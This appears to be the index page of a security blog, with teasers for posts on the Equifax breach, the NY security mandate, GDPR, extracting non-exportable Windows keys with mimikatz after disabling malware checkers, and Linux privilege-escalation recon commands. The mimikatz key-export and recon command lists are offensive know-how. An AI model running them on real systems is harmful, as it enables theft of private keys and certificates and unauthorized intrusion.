Practical Security

App, Data, Cloud and IoT Security

Dealing with the Equifax data breach

The best proactive defense against potential credit abuse and identity theft as a result of this data breach is a credit freeze. It’s been proven time and again as the most effective way to stop anyone tampering with your hard earned credit score, opening credit cards or loans in your... [Read More]

How to extract non-exportable windows keys

get mimikatz boot into recovery (with network) holding F8, to disable any and all malware checkers run mimikatz crypto::capi crypto::cng crypto::certificates /export crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::keys /export crypto::keys /machine /export [Read More]

NY Security Mandate

The standard has fifteen requirements for covered entities (more than ten employees, more than $5M in gross annual revenue, or more than $10M in year-end assets): [Read More]

How to recon Linux for potential privesc

cat /etc/issue cat /etc/*-release cat /proc/version uname -a uname -mrs rpm -q kernel dmesg | grep Linux ls /boot | grep vmlinuz- cat /etc/profile cat /etc/bashrc cat ~/.bash_profile cat ~/.bashrc cat ~/.bash_logout env set lpstat -a ps aux ps -ef top cat /etc/services ps aux | grep root ps -ef... [Read More]

GDPR for US companies

The General Data Protection Regulation (GDPR) was passed by the EU in April, 2016, and goes into effect in May of 2018. It repealed and replaced the General Data Protection Directive (GDPD), which was previously the primary directive covering privacy across the EU. The GDPR is more specific in its... [Read More]